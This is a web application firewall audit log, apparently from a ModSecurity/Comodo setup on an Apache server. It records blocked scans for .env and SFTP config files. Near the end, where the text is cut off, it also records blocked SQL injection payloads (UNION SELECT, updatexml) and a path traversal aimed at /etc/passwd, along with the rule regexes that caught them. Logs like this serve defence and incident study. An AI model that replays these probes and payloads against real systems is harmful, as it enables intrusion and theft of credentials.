p2=0, p3=0, p4=0, p5=35, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f557056e-Z-- --6a5dcf67-A-- [19/Apr/2025:11:17:48 +0700] aAMj7HNa4dA2HllpK_MfxQAAAIk 103.236.140.4 35906 103.236.140.4 8181 --6a5dcf67-B-- GET /app/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --6a5dcf67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a5dcf67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036268957528 845 (- - -) Stopwatch2: 1745036268957528 845; combined=389, p1=347, p2=0, p3=0, p4=0, p5=42, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a5dcf67-Z-- --a0a4c61d-A-- [19/Apr/2025:11:17:49 +0700] aAMj7Q6cTFSgLAHl7Ppq7AAAAAY 103.236.140.4 35908 103.236.140.4 8181 --a0a4c61d-B-- GET /config/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --a0a4c61d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0a4c61d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036269910918 903 (- - -) Stopwatch2: 1745036269910918 903; combined=366, p1=324, p2=0, p3=0, p4=0, p5=42, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0a4c61d-Z-- --8398f572-A-- [19/Apr/2025:11:17:50 +0700] aAMj7nNa4dA2HllpK_MfxwAAAIg 103.236.140.4 35914 103.236.140.4 8181 --8398f572-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --8398f572-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8398f572-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036270953249 698 (- - -) Stopwatch2: 1745036270953249 698; combined=265, p1=230, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8398f572-Z-- --c66da717-A-- [19/Apr/2025:11:17:52 +0700] aAMj8A6cTFSgLAHl7Ppq8AAAAAo 103.236.140.4 35926 103.236.140.4 8181 --c66da717-B-- GET /laravel/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --c66da717-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c66da717-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036272747375 756 (- - -) Stopwatch2: 1745036272747375 756; combined=339, p1=311, p2=0, p3=0, p4=0, p5=27, sr=150, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c66da717-Z-- --c847ce79-A-- [19/Apr/2025:11:17:53 +0700] aAMj8Q6cTFSgLAHl7Ppq8gAAAAw 103.236.140.4 35932 103.236.140.4 8181 --c847ce79-B-- GET /library/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --c847ce79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c847ce79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036273607156 827 (- - -) Stopwatch2: 1745036273607156 827; combined=357, p1=315, p2=0, p3=0, p4=0, p5=41, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c847ce79-Z-- --43efa325-A-- [19/Apr/2025:11:17:54 +0700] aAMj8g6cTFSgLAHl7Ppq9AAAABI 103.236.140.4 35938 103.236.140.4 8181 --43efa325-B-- GET /nextjs-app/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --43efa325-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43efa325-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036274291485 752 (- - -) Stopwatch2: 1745036274291485 752; combined=291, p1=255, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43efa325-Z-- --0e0f2355-A-- [19/Apr/2025:11:17:55 +0700] aAMj8w6cTFSgLAHl7Ppq9QAAABU 103.236.140.4 35940 103.236.140.4 8181 --0e0f2355-B-- GET /node-api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --0e0f2355-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e0f2355-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036275115163 790 (- - -) Stopwatch2: 1745036275115163 790; combined=345, p1=286, p2=0, p3=0, p4=0, p5=59, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e0f2355-Z-- --5d087948-A-- [19/Apr/2025:11:17:55 +0700] aAMj8w6cTFSgLAHl7Ppq9wAAABY 103.236.140.4 35946 103.236.140.4 8181 --5d087948-B-- GET /vendor/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --5d087948-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d087948-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036275859093 779 (- - -) Stopwatch2: 1745036275859093 779; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d087948-Z-- --05c3c666-A-- [19/Apr/2025:11:17:57 +0700] aAMj9Q6cTFSgLAHl7Ppq-gAAAAA 103.236.140.4 35954 103.236.140.4 8181 --05c3c666-B-- GET /backend/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --05c3c666-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05c3c666-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036277436827 697 (- - -) Stopwatch2: 1745036277436827 697; combined=281, p1=231, p2=0, p3=0, p4=0, p5=49, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05c3c666-Z-- --2368250e-A-- [19/Apr/2025:11:17:58 +0700] aAMj9g6cTFSgLAHl7Ppq_gAAAAc 103.236.140.4 35966 103.236.140.4 8181 --2368250e-B-- GET /myproject/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --2368250e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2368250e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036278905937 673 (- - -) Stopwatch2: 1745036278905937 673; combined=259, p1=225, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2368250e-Z-- --a794e72d-A-- [19/Apr/2025:11:17:59 +0700] aAMj9w6cTFSgLAHl7PprAAAAAAs 103.236.140.4 35972 103.236.140.4 8181 --a794e72d-B-- GET /.envs/.production/.django HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --a794e72d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a794e72d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036279971957 658 (- - -) Stopwatch2: 1745036279971957 658; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a794e72d-Z-- --4739ae4b-A-- [19/Apr/2025:11:18:00 +0700] aAMj-A6cTFSgLAHl7PprAgAAAA4 103.236.140.4 35978 103.236.140.4 8181 --4739ae4b-B-- GET /react-app/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --4739ae4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4739ae4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036280849855 802 (- - -) Stopwatch2: 1745036280849855 802; combined=322, p1=289, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4739ae4b-Z-- --b105f258-A-- [19/Apr/2025:11:18:01 +0700] aAMj-Q6cTFSgLAHl7PprAwAAAA8 103.236.140.4 35980 103.236.140.4 8181 --b105f258-B-- GET /react-app/.env.production HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --b105f258-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b105f258-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036281513364 1252 (- - -) Stopwatch2: 1745036281513364 1252; combined=506, p1=453, p2=0, p3=0, p4=0, p5=53, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b105f258-Z-- --3ae4ed2e-A-- [19/Apr/2025:11:46:51 +0700] aAMquw6cTFSgLAHl7PpsdAAAABQ 103.236.140.4 42490 103.236.140.4 8181 --3ae4ed2e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.62 Accept-Charset: utf-8 --3ae4ed2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ae4ed2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745038011605525 734 (- - -) Stopwatch2: 1745038011605525 734; combined=312, p1=280, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ae4ed2e-Z-- --b7f19d08-A-- [19/Apr/2025:13:05:33 +0700] aAM9LQ6cTFSgLAHl7PpyuQAAAAc 103.236.140.4 60712 103.236.140.4 8181 --b7f19d08-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 160.250.132.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 160.250.132.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --b7f19d08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7f19d08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745042733476987 793 (- - -) Stopwatch2: 1745042733476987 793; combined=359, p1=311, p2=0, p3=0, p4=0, p5=48, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7f19d08-Z-- --42fa7445-A-- [19/Apr/2025:14:54:53 +0700] aANWzUruoUXZj665VUGk8QAAANQ 103.236.140.4 40560 103.236.140.4 8181 --42fa7445-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.223.62.250 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.223.62.250 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --42fa7445-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42fa7445-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745049293813539 747 (- - -) Stopwatch2: 1745049293813539 747; combined=316, p1=284, p2=0, p3=0, p4=0, p5=32, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42fa7445-Z-- --cde63e3a-A-- [19/Apr/2025:16:21:00 +0700] aANq_OvDiFC_ir7MDwbkCwAAAEw 103.236.140.4 53712 103.236.140.4 8181 --cde63e3a-B-- POST /guest_auth/guestIsUp.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: http Connection: close --cde63e3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cde63e3a-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745054460231354 850 (- - -) Stopwatch2: 1745054460231354 850; combined=355, p1=301, p2=0, p3=0, p4=0, p5=54, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cde63e3a-Z-- --470bdf3d-A-- [19/Apr/2025:16:21:58 +0700] aANrNg6cTFSgLAHl7PrJ8gAAAAg 103.236.140.4 56626 103.236.140.4 8181 --470bdf3d-B-- GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:127.0) Gecko/20100101 Firefox/127.0 --470bdf3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --470bdf3d-E-- --470bdf3d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||103.236.140.4|F|2"] [data "Matched Data: 1 UNION SELECT md5(999999999) as id from HrmResourceManager found within MATCHED_VAR: 1 UNION SELECT md5(999999999) as id from HrmResourceManager"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054518263346 5448 (- - -) Stopwatch2: 1745054518263346 5448; combined=3344, p1=654, p2=2635, p3=0, p4=0, p5=55, sr=158, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --470bdf3d-Z-- --dc4bd512-A-- [19/Apr/2025:16:22:00 +0700] aANrOOvDiFC_ir7MDwbkbAAAAFY 103.236.140.4 56738 103.236.140.4 8181 --dc4bd512-B-- POST /zentao/user-login.html HTTP/1.0 Referer: 103.236.140.4/zentao/user-login.html Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close Content-Length: 72 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15-620 Content-Type: application/x-www-form-urlencoded --dc4bd512-C-- account=admin'+and++updatexml(1,concat(0x1,md5(999999999)),1)+and+'1'='1 --dc4bd512-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc4bd512-E-- --dc4bd512-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at ARGS_POST:account. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||103.236.140.4|F|2"] [data "Matched Data: and '1'='1 found within ARGS_POST:account: admin' and updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054520284410 2946 (- - -) Stopwatch2: 1745054520284410 2946; combined=1788, p1=410, p2=1344, p3=0, p4=0, p5=33, sr=69, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc4bd512-Z-- --fd17a43c-A-- [19/Apr/2025:16:22:00 +0700] aANrOEruoUXZj665VUHoPAAAAMM 103.236.140.4 56740 103.236.140.4 8181 --fd17a43c-B-- GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) 